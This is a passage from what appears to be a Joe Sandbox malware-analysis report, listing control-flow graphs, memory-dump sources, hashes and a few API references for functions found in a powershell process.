                                control_flow_graph 201 7cc3ce8-7cc3d0d 202 7cc3f00-7cc3f4a 201->202 203 7cc3d13-7cc3d18 201->203 213 7cc40ce-7cc4112 202->213 214 7cc3f50-7cc3f55 202->214 204 7cc3d1a-7cc3d20 203->204 205 7cc3d30-7cc3d34 203->205 206 7cc3d24-7cc3d2e 204->206 207 7cc3d22 204->207 208 7cc3d3a-7cc3d3c 205->208 209 7cc3eb0-7cc3eba 205->209 206->205 207->205 211 7cc3d4c 208->211 212 7cc3d3e-7cc3d4a 208->212 215 7cc3ebc-7cc3ec5 209->215 216 7cc3ec8-7cc3ece 209->216 218 7cc3d4e-7cc3d50 211->218 212->218 235 7cc4228-7cc425d 213->235 236 7cc4118-7cc411d 213->236 219 7cc3f6d-7cc3f71 214->219 220 7cc3f57-7cc3f5d 214->220 221 7cc3ed4-7cc3ee0 216->221 222 7cc3ed0-7cc3ed2 216->222 218->209 225 7cc3d56-7cc3d75 218->225 223 7cc3f77-7cc3f79 219->223 224 7cc4080-7cc408a 219->224 226 7cc3f5f 220->226 227 7cc3f61-7cc3f6b 220->227 229 7cc3ee2-7cc3efd 221->229 222->229 231 7cc3f89 223->231 232 7cc3f7b-7cc3f87 223->232 233 7cc408c-7cc4094 224->233 234 7cc4097-7cc409d 224->234 269 7cc3d85 225->269 270 7cc3d77-7cc3d83 225->270 226->219 227->219 237 7cc3f8b-7cc3f8d 231->237 232->237 238 7cc409f-7cc40a1 234->238 239 7cc40a3-7cc40af 234->239 252 7cc425f-7cc4281 235->252 253 7cc428b-7cc4295 235->253 241 7cc411f-7cc4125 236->241 242 7cc4135-7cc4139 236->242 237->224 246 7cc3f93-7cc3fb2 237->246 247 7cc40b1-7cc40cb 238->247 239->247 248 7cc4129-7cc4133 241->248 249 7cc4127 241->249 250 7cc413f-7cc4141 242->250 251 7cc41da-7cc41e4 242->251 285 7cc3fb4-7cc3fc0 246->285 286 7cc3fc2 246->286 248->242 249->242 258 7cc4151 250->258 259 7cc4143-7cc414f 250->259 255 7cc41e6-7cc41ee 251->255 256 7cc41f1-7cc41f7 251->256 296 7cc42d5-7cc42dc 252->296 297 7cc4283-7cc4288 252->297 267 7cc429f-7cc42a5 253->267 268 7cc4297-7cc429c 253->268 263 7cc41fd-7cc4209 256->263 264 7cc41f9-7cc41fb 256->264 265 7cc4153-7cc4155 258->265 259->265 272 7cc420b-7cc4225 263->272 264->272 265->251 273 7cc415b-7cc415d 265->273 274 7cc42ab-7cc42b7 267->274 275 7cc42a7-7cc42a9 267->275 276 7cc3d87-7cc3d89 269->276 270->276 279 7cc415f-7cc4165 273->279 280 7cc4177-7cc417e 273->280 282 7cc42b9-7cc42d2 274->282 275->282 276->209 283 7cc3d8f-7cc3d96 276->283 287 7cc4169-7cc4175 279->287 288 7cc4167 279->288 290 7cc4196-7cc41d7 280->290 291 7cc4180-7cc4186 280->291 283->202 292 7cc3d9c-7cc3da1 283->292 298 7cc3fc4-7cc3fc6 285->298 286->298 287->280 288->280 299 7cc4188 291->299 300 7cc418a-7cc4194 291->300 301 7cc3db9-7cc3dc8 292->301 302 7cc3da3-7cc3da9 292->302 305 7cc42de-7cc42fe 296->305 298->224 306 7cc3fcc-7cc4003 298->306 299->290 300->290 301->209 313 7cc3dce-7cc3dec 301->313 303 7cc3dad-7cc3db7 302->303 304 7cc3dab 302->304 303->301 304->301 319 7cc432d-7cc434c 305->319 320 7cc4300-7cc4326 305->320 323 7cc401d-7cc4024 306->323 324 7cc4005-7cc400b 306->324 313->209 326 7cc3df2-7cc3e17 313->326 319->305 330 7cc434e-7cc435c 319->330 320->319 331 7cc403c-7cc407d 323->331 332 7cc4026-7cc402c 323->332 328 7cc400d 324->328 329 7cc400f-7cc401b 324->329 326->209 351 7cc3e1d-7cc3e24 326->351 328->323 329->323 333 7cc435e-7cc437b 330->333 334 7cc4395-7cc439f 330->334 335 7cc402e 332->335 336 7cc4030-7cc403a 332->336 348 7cc437d-7cc438f 333->348 349 7cc43e5-7cc43ea 333->349 341 7cc43a8-7cc43ae 334->341 342 7cc43a1-7cc43a5 334->342 335->331 336->331 344 7cc43b4-7cc43c0 341->344 345 7cc43b0-7cc43b2 341->345 350 7cc43c2-7cc43e2 344->350 345->350 348->334 349->348 353 7cc3e6a-7cc3e9d 351->353 354 7cc3e26-7cc3e41 351->354 368 7cc3ea4-7cc3ead 353->368 359 7cc3e5b-7cc3e5f 354->359 360 7cc3e43-7cc3e49 354->360 365 7cc3e66-7cc3e68 359->365 362 7cc3e4d-7cc3e59 360->362 363 7cc3e4b 360->363 362->359 363->359 365->368
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q
                                • API String ID: 0-1785108022
                                • Opcode ID: 89e01f1a730934dd054732d7905ba3e768e4a15fbc3b6a0535555abce7a2c00b
                                • Instruction ID: 3c904911f11744c09ae5c1d9bceee98b3855de7bda4de776941238ff2d63a52d
                                • Opcode Fuzzy Hash: 89e01f1a730934dd054732d7905ba3e768e4a15fbc3b6a0535555abce7a2c00b
                                • Instruction Fuzzy Hash: BE125AB17043918FCB29DB6894617AABFB69FC2310F14C4BED545DB291DB31CA41CBA2
                                Function 08E36488 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 372 8e36488-8e3648e 373 8e36490-8e36496 372->373 374 8e36498-8e364cb 372->374 373->374 375 8e364d3-8e364ff SetThreadToken 374->375 376 8e36501-8e36507 375->376 377 8e36508-8e36525 375->377 376->377
                                APIs
                                • SetThreadToken.KERNELBASE(?), ref: 08E364F2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2152442795.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_8e30000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 05fd8f1cb5311d1b9428eb992d59f6da3a18c867d9c89752154161fb1b191550
                                • Instruction ID: 8d8d5719e81599a01ab41b32a25f31e59601063062c7a94cf0fcbcaf0e4d4b9b
                                • Opcode Fuzzy Hash: 05fd8f1cb5311d1b9428eb992d59f6da3a18c867d9c89752154161fb1b191550
                                • Instruction Fuzzy Hash: F51167B29002489FDB10DFAAD585B9EFFF8AF49320F108869D418A7210C774A944CFA0
                                Function 08E36490 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 380 8e36490-8e364ff SetThreadToken 383 8e36501-8e36507 380->383 384 8e36508-8e36525 380->384 383->384
                                APIs
                                • SetThreadToken.KERNELBASE(?), ref: 08E364F2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2152442795.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_8e30000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 410cd2c4527df6791c2a58e62b7c9b6024e4adb60822104e86d6ea62d83678e2
                                • Instruction ID: 4617a85875a6097bebbc4ea9220459227e75b3c4d09c7250b6c6f474cf4f2da8
                                • Opcode Fuzzy Hash: 410cd2c4527df6791c2a58e62b7c9b6024e4adb60822104e86d6ea62d83678e2
                                • Instruction Fuzzy Hash: B91125B19002488FCB10DF9AD584B9EFBF8EF48324F248469D418A7210C778A944CFA0
                                Function 04E5E5C1 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 387 4e5e5c1-4e5e5c8 388 4e5e62a-4e5e630 387->388 389 4e5e5ca-4e5e60a 387->389 390 4e5e693-4e5e6b6 388->390 391 4e5e632-4e5e689 388->391 402 4e5e6bc-4e5e6d3 390->402 403 4e5e73a-4e5e753 390->403 391->390 409 4e5e6db-4e5e738 402->409 406 4e5e755 403->406 407 4e5e75e 403->407 406->407 408 4e5e75f 407->408 408->408 409->402 409->403
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: pij
                                • API String ID: 0-2463107502
                                • Opcode ID: f46abb7136a08bd06ca9465561a5e488552a6e5a80b5692cc2ffa69c857de028
                                • Instruction ID: d3825c943010d04a6690ce3f5c4d4eab006742aa1556d88d1b6d92836f64fec7
                                • Opcode Fuzzy Hash: f46abb7136a08bd06ca9465561a5e488552a6e5a80b5692cc2ffa69c857de028
                                • Instruction Fuzzy Hash: B641DD34A012049FCB15DFB9E954A9EBBF2FF49300F1085AAD445EB361DB74AD05CB91
                                Function 04E56FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 417 4e56fe0-4e56fff 418 4e57105-4e57143 417->418 419 4e57005-4e57008 417->419 446 4e5700a call 4e57697 419->446 447 4e5700a call 4e5767c 419->447 420 4e57010-4e57022 422 4e57024 420->422 423 4e5702e-4e57043 420->423 422->423 429 4e570ce-4e570e7 423->429 430 4e57049-4e57059 423->430 435 4e570f2 429->435 436 4e570e9 429->436 431 4e57065-4e5707d call 4e5bf20 430->431 432 4e5705b 430->432 439 4e570bd-4e570c8 431->439 440 4e5707f-4e5708f 431->440 432->431 435->418 436->435 439->429 439->430 441 4e57091-4e570a1 440->441 442 4e570ab-4e570b5 440->442 444 4e570a9 441->444 442->439 444->439 446->420 447->420
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq
                                • API String ID: 0-600464949
                                • Opcode ID: 6e00049e89fc931580cb397d6bcad7d87b8b8160614915c76d1c651c2b4ec30d
                                • Instruction ID: 3928953ae1de14e4473c04a7ec8eed8ed43dfa1cf40d48c9c4388b4e1dd55633
                                • Opcode Fuzzy Hash: 6e00049e89fc931580cb397d6bcad7d87b8b8160614915c76d1c651c2b4ec30d
                                • Instruction Fuzzy Hash: 45416D34B042048FDB14DFA9C558AAEBBF2EF8D315F145099E806AB3A1CB35EC01CB60
                                Function 04E5E610 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 448 4e5e610-4e5e630 449 4e5e693-4e5e6b6 448->449 450 4e5e632-4e5e689 448->450 457 4e5e6bc-4e5e6d3 449->457 458 4e5e73a-4e5e753 449->458 450->449 464 4e5e6db-4e5e738 457->464 461 4e5e755 458->461 462 4e5e75e 458->462 461->462 463 4e5e75f 462->463 463->463 464->457 464->458
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: pij
                                • API String ID: 0-2463107502
                                • Opcode ID: d17b5d2fd75050447efd4b11c3b3756382e2173774ca9c4edb8a03e3f3ebd5cf
                                • Instruction ID: b07e42a04fc44fa9b7e752a821bfe32cf66f25d7a89a4a75e8adccba5c95e23a
                                • Opcode Fuzzy Hash: d17b5d2fd75050447efd4b11c3b3756382e2173774ca9c4edb8a03e3f3ebd5cf
                                • Instruction Fuzzy Hash: 0341DB34A002048FCB15CFAAD954A9EBBF6FF49300F1085A9D446AB3A1DB74AC04CBA1
                                Function 04E5E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 493 4e5e640-4e5e6b6 500 4e5e6bc-4e5e6d3 493->500 501 4e5e73a-4e5e753 493->501 507 4e5e6db-4e5e738 500->507 504 4e5e755 501->504 505 4e5e75e 501->505 504->505 506 4e5e75f 505->506 506->506 507->500 507->501
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: pij
                                • API String ID: 0-2463107502
                                • Opcode ID: 55b8719cd105bf89851be2fc8093dc841fca2ec68a25e57c4633d482ede9b160
                                • Instruction ID: 15b15797882a0c048db2b0d1e278e8ee0b04b5711b8056773cb8b49026c2bae9
                                • Opcode Fuzzy Hash: 55b8719cd105bf89851be2fc8093dc841fca2ec68a25e57c4633d482ede9b160
                                • Instruction Fuzzy Hash: 05318C34A012159FCB24DF7AE594A9EBBF6FF88300F108528D41AAB390DB74AD05CB91
                                Function 04E5AFA8 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 515 4e5afa8-4e5afb1 call 4e5a79c 517 4e5afb6-4e5afba 515->517 518 4e5afbc-4e5afc9 517->518 519 4e5afca-4e5b065 517->519 525 4e5b067-4e5b06d 519->525 526 4e5b06e-4e5b08b 519->526 525->526
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (&]q
                                • API String ID: 0-1343553580
                                • Opcode ID: 2e870ddcb7cff52a3fa5f7ce4667a721be033e8ef3c2259aee5604a8486c5cbf
                                • Instruction ID: e332c36714459f8d7593f6a90943523ec9f5e19e73a6a0989da7709c5ae93129
                                • Opcode Fuzzy Hash: 2e870ddcb7cff52a3fa5f7ce4667a721be033e8ef3c2259aee5604a8486c5cbf
                                • Instruction Fuzzy Hash: 9D21DC75A003588FCB14DFAED4006AFBBF9EF89320F24846AD418A7350CA74A805CBA5
                                Function 07CC17B8 Relevance: .3, Instructions: 335COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 724 7cc17b8-7cc17da 725 7cc1969-7cc197c 724->725 726 7cc17e0-7cc17e5 724->726 736 7cc197e-7cc1996 725->736 737 7cc1997-7cc19b5 725->737 727 7cc17fd-7cc1801 726->727 728 7cc17e7-7cc17ed 726->728 731 7cc1914-7cc191e 727->731 732 7cc1807-7cc180b 727->732 729 7cc17ef 728->729 730 7cc17f1-7cc17fb 728->730 729->727 730->727 738 7cc192c-7cc1932 731->738 739 7cc1920-7cc1929 731->739 734 7cc180d-7cc181e 732->734 735 7cc184b 732->735 734->725 757 7cc1824-7cc1829 734->757 743 7cc184d-7cc184f 735->743 736->737 744 7cc19bb-7cc19c0 737->744 745 7cc1b04-7cc1b34 737->745 740 7cc1938-7cc1944 738->740 741 7cc1934-7cc1936 738->741 746 7cc1946-7cc1966 740->746 741->746 743->731 748 7cc1855-7cc1859 743->748 749 7cc19d8-7cc19dc 744->749 750 7cc19c2-7cc19c8 744->750 759 7cc1b44 745->759 760 7cc1b36-7cc1b42 745->760 748->731 758 7cc185f-7cc1863 748->758 755 7cc1ab4-7cc1abe 749->755 756 7cc19e2-7cc19e4 749->756 751 7cc19cc-7cc19d6 750->751 752 7cc19ca 750->752 751->749 752->749 764 7cc1acc-7cc1ad2 755->764 765 7cc1ac0-7cc1ac9 755->765 762 7cc19f4 756->762 763 7cc19e6-7cc19f2 756->763 766 7cc182b-7cc1831 757->766 767 7cc1841-7cc1849 757->767 768 7cc1865-7cc186e 758->768 769 7cc1886 758->769 771 7cc1b46-7cc1b48 759->771 760->771 772 7cc19f6-7cc19f8 762->772 763->772 776 7cc1ad8-7cc1ae4 764->776 777 7cc1ad4-7cc1ad6 764->777 774 7cc1835-7cc183f 766->774 775 7cc1833 766->775 767->743 778 7cc1875-7cc1882 768->778 779 7cc1870-7cc1873 768->779 773 7cc1889-7cc1911 769->773 780 7cc1b7c-7cc1b86 771->780 781 7cc1b4a-7cc1b50 771->781 772->755 783 7cc19fe-7cc1a16 772->783 774->767 775->767 784 7cc1ae6-7cc1b01 776->784 777->784 785 7cc1884 778->785 779->785 792 7cc1b88-7cc1b8d 780->792 793 7cc1b90-7cc1b96 780->793 788 7cc1b5e-7cc1b79 781->788 789 7cc1b52-7cc1b54 781->789 800 7cc1a18-7cc1a1e 783->800 801 7cc1a30-7cc1a34 783->801 785->773 789->788 794 7cc1b9c-7cc1ba8 793->794 795 7cc1b98-7cc1b9a 793->795 798 7cc1baa-7cc1bc1 794->798 795->798 806 7cc1a20 800->806 807 7cc1a22-7cc1a2e 800->807 808 7cc1a3a-7cc1a41 801->808 806->801 807->801 811 7cc1a48-7cc1aa5 808->811 812 7cc1a43-7cc1a46 808->812 813 7cc1aaa-7cc1ab1 811->813 812->813
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b496fabcf7aef4318831afcb5bbf3fa0eeac911416c1c2bf67854a3c088ca4fa
                                • Instruction ID: b7ca9c3183e15b4f6d8c898f99936abce77dd3d1ea902f79d27ac6fafbf2486a
                                • Opcode Fuzzy Hash: b496fabcf7aef4318831afcb5bbf3fa0eeac911416c1c2bf67854a3c088ca4fa
                                • Instruction Fuzzy Hash: 01B149F170420A9FCB14DB6EC4406AABBE6AF86211F1CC0BFD445DB252DB31D941CBA2
                                Function 04E529F0 Relevance: .2, Instructions: 211COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06eab3dd9bf3e2f3da8a4b9dd39fc668b8f525995bc79b402c8028d46876f87e
                                • Instruction ID: a45a6bcac7a5edd52361a6ae08483562fbd8d6d0221c48132439164a7cdb37b9
                                • Opcode Fuzzy Hash: 06eab3dd9bf3e2f3da8a4b9dd39fc668b8f525995bc79b402c8028d46876f87e
                                • Instruction Fuzzy Hash: D6916874A002099FCB15CF58C5D49AAFBB1FF88310B24869AD955AB365C735FC91CFA0
                                Function 04E57740 Relevance: .2, Instructions: 156COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 45d4dd4e41b8317d9875b1001ae801f0d1429de1111f361c29c2548b3d80b4e7
                                • Instruction ID: c1e6255d209c6fac91160b32a838965a6d595199dc0d74a8978661f82f0a7eb1
                                • Opcode Fuzzy Hash: 45d4dd4e41b8317d9875b1001ae801f0d1429de1111f361c29c2548b3d80b4e7
                                • Instruction Fuzzy Hash: CA51F3757042158FD704DB79E844A6ABBEAFFC8315F1544AAD809CB362EB35EC01CBA0
                                Function 04E5BAD0 Relevance: .2, Instructions: 155COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7106d198b29959555312294975372b0e7206864c9e97b25305e0daf6d92687c1
                                • Instruction ID: 2ff06a8d21a248cee0920816d4f59cae941b197377add2327be442be3563554b
                                • Opcode Fuzzy Hash: 7106d198b29959555312294975372b0e7206864c9e97b25305e0daf6d92687c1
                                • Instruction Fuzzy Hash: 62610971E002089FCB14DFA9D58469DBBF5FF88314F14816AE819AB364EB74AC45CB64
                                Function 04E5BAC0 Relevance: .1, Instructions: 148COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef332e5562d2a484d3c059a4301b5826dd5a96789b2b7abb06282a8af9c6dce3
                                • Instruction ID: b3adf461ea6066c2769c14549ddda79d45b10f1a07e48f9aee38a685243f1164
                                • Opcode Fuzzy Hash: ef332e5562d2a484d3c059a4301b5826dd5a96789b2b7abb06282a8af9c6dce3
                                • Instruction Fuzzy Hash: A8511A75E01248DFCB54CFA9D584A9DFBF5FF88310F14806AE819AB364EB34A845CB64
                                Function 04E5E421 Relevance: .1, Instructions: 140COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c425c625515e9169d35e2a15fa8da0c16d4f76aba627d2c2e1805f7c262e0ec0
                                • Instruction ID: 664c12df7852a4db7c359d14a663489b622ddd91bfd7799e5269b03a66d89d62
                                • Opcode Fuzzy Hash: c425c625515e9169d35e2a15fa8da0c16d4f76aba627d2c2e1805f7c262e0ec0
                                • Instruction Fuzzy Hash: 63519E34B002058FCB10DF6CD59492EBBE6EF8831471585A9E949CF375EB30ED068B91
                                Function 04E5E430 Relevance: .1, Instructions: 130COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 16099adeb1b52a0c591f91f465d8bd0d129c1a43026c86159f3d446a64c4dade
                                • Instruction ID: bfb30920a4f6848c17fa42a09d20a25d89989830839d33deb80d3bc214fdc0d5
                                • Opcode Fuzzy Hash: 16099adeb1b52a0c591f91f465d8bd0d129c1a43026c86159f3d446a64c4dade
                                • Instruction Fuzzy Hash: FC414B34B002058FCB10DF6CD69596ABBE6EFC830871584A9E909DF365EB34ED068B91
                                Function 04E52B00 Relevance: .1, Instructions: 113COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad3759b269625683d2a51cd2a74fc73e5315311bd7eb42a7d3b889b335ced839
                                • Instruction ID: 726c6f46a2a6130f65b049057f76cbfe76bee786bb110f8bcadef7ac747fcabb
                                • Opcode Fuzzy Hash: ad3759b269625683d2a51cd2a74fc73e5315311bd7eb42a7d3b889b335ced839
                                • Instruction Fuzzy Hash: 5E412678A005059FCB09CF58C5989EAFBB1FF48314B218599D915AB365C732FC91CFA0
                                Function 07CC3CDF Relevance: .1, Instructions: 112COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cde26335389b551c8b235de6346fa26b8ff44b0d93bc38d94151a1b9c8933172
                                • Instruction ID: c130c97e7a2d81d79eeb2d72fea2378c6a8f12f2a756c2f8a5bf7a2b985bafb6
                                • Opcode Fuzzy Hash: cde26335389b551c8b235de6346fa26b8ff44b0d93bc38d94151a1b9c8933172
                                • Instruction Fuzzy Hash: D64105F0B20242CFCB24DB25D581AAA7BB29B85648F14C4ADD900AF295D731DE45CBE7
                                Function 04E5C398 Relevance: .1, Instructions: 101COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e120bb0d8089228f2a805c53eb32626d26ebf5760911d046ebcb571d6c2c7bd
                                • Instruction ID: ec5b601aa02a53389ecc0832c2376140ed6fbdde22786af6d509ceaa10d756b4
                                • Opcode Fuzzy Hash: 0e120bb0d8089228f2a805c53eb32626d26ebf5760911d046ebcb571d6c2c7bd
                                • Instruction Fuzzy Hash: 8A317C353003019FD709EB68E854F9AB7AAEFC4215F108539D609CB365EF74AC09CBA1
                                Function 04E56FD1 Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bbc5b4f587c044a53ccf28846846f43db15dd7c406942419f8cc46920cf2865f
                                • Instruction ID: e1df60e63202649c6fcaecf467206652d865c26f900ad4c98b701074fe8c5966
                                • Opcode Fuzzy Hash: bbc5b4f587c044a53ccf28846846f43db15dd7c406942419f8cc46920cf2865f
                                • Instruction Fuzzy Hash: 02313C35B002158FCB14CFA5D558AAEBBF2EF8D315F1450A9E806AB3A1DB35EC11CB60
                                Function 04E5AE70 Relevance: .1, Instructions: 87COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17405f2e55c815f75cef92c21d547fd0be2dd1dcf2fcee40eb10c35a5b4e3c77
                                • Instruction ID: 3893d37fe6ff5f8e85a1f4e5b07021ec0924584c00239e7820d70239b8875562
                                • Opcode Fuzzy Hash: 17405f2e55c815f75cef92c21d547fd0be2dd1dcf2fcee40eb10c35a5b4e3c77
                                • Instruction Fuzzy Hash: E7317070E012099FDB04DFA9D494AAEBBF6EF88304F14902DE805EB364EB349C418B65
                                Function 04E5E051 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f4cb296213db6792849031562a1844dfa1fe91dc7267d488d57a35cf2dc5480
                                • Instruction ID: 87adad54c1f47e8899e67c27062bd919eab2aa966a1cb6cf6ba2506e22294bbd
                                • Opcode Fuzzy Hash: 4f4cb296213db6792849031562a1844dfa1fe91dc7267d488d57a35cf2dc5480
                                • Instruction Fuzzy Hash: 88314C34A002158FCB14DF69E458A9EBBF6FF8D714F14856AD806EB3A0DB71AC45CB90
                                Function 04E5AE80 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 987cf09a2d05f5caebceaf73ade800d6f2f76974ed1789d185a1aaa3bde45e07
                                • Instruction ID: 0a758b88c778c23649a963413d32c742f514da793bdc02e9cddff45ca00640fc
                                • Opcode Fuzzy Hash: 987cf09a2d05f5caebceaf73ade800d6f2f76974ed1789d185a1aaa3bde45e07
